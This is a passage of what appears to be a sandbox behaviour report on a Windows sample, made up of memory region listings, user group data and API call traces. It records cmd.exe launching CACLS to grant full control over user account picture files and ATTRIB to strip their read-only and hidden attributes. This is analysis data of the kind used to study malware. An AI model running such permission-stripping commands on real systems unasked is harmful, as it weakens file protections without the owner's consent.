Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24969 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24970 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24971 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24972 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 24973 start_va = 0x770000 end_va = 0x778fff entry_point = 0x770000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 24974 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24975 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24976 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
Region: id = 24977 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24978 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24979 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24980 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24981 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24982 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24983 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 24984 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24985 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24986 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24987 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24988 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24989 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24990 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 445 os_tid = 0xb10 Thread: id = 447 os_tid = 0xbf0 Process: id = "330" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "328" os_parent_pid = "0xa14" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25013 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25014 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25015 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25016 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x1b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25017 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 25018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25021 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25023 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25024 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25025 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25026 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000110000" filename = "" Region: id = 25027 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 25028 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25029 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25030 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25031 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25032 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25033 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25034 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25035 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 25036 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25037 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25038 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25039 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25040 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25041 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25042 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 450 os_tid = 0xcb8 Process: id = "331" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x47c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25043 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25044 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25045 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25046 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 25047 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25048 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25049 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25050 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25051 
start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25052 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25053 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25054 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25055 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25056 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25057 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 25058 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25059 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25060 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25061 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 25062 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25063 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25064 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25065 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25066 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25067 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 25068 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25069 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25070 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25071 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" 
filename = "" Region: id = 25072 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25073 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25074 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 25075 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 25076 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 25077 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 453 os_tid = 0xa24 [0179.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f944 | out: lpSystemTimeAsFileTime=0x26f944*(dwLowDateTime=0xa09da660, dwHighDateTime=0x1d440a9)) [0179.950] GetCurrentProcessId () returned 0x47c [0179.950] GetCurrentThreadId () returned 0xa24 [0179.950] GetTickCount () returned 0x33dda [0179.950] QueryPerformanceCounter (in: lpPerformanceCount=0x26f93c | out: lpPerformanceCount=0x26f93c*=23673966014) returned 1 [0179.951] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0179.951] __set_app_type (_Type=0x1) [0179.951] __p__fmode () returned 0x76b331f4 [0179.951] __p__commode () returned 0x76b331fc [0179.951] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0179.951] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0179.951] 
GetCurrentThreadId () returned 0xa24 [0179.951] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa24) returned 0x38 [0179.952] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0179.952] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0179.952] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.952] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.952] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f8d4 | out: phkResult=0x26f8d4*=0x0) returned 0x2 [0179.952] VirtualQuery (in: lpAddress=0x26f90b, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0179.952] 
GetConsoleOutputCP () returned 0x1b5 [0179.952] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.952] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0179.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.952] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0179.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.952] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0179.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.953] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0179.953] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.953] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0179.953] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.953] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0179.953] GetEnvironmentStringsW () returned 0x360308* [0179.953] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.954] GetEnvironmentStringsW () returned 0x360308* [0179.954] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e844 | out: phkResult=0x26e844*=0x40) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0xb8, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: 
lpType=0x26e84c*=0x0, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x0, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegCloseKey (hKey=0x40) returned 0x0 [0179.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e844 | out: phkResult=0x26e844*=0x40) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x1000) 
returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x0, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.955] RegCloseKey (hKey=0x40) returned 0x0 [0179.955] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638e [0179.955] srand (_Seed=0x5b88638e) [0179.955] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" [0179.955] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" [0179.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361a68, nSize=0x104 | out: 
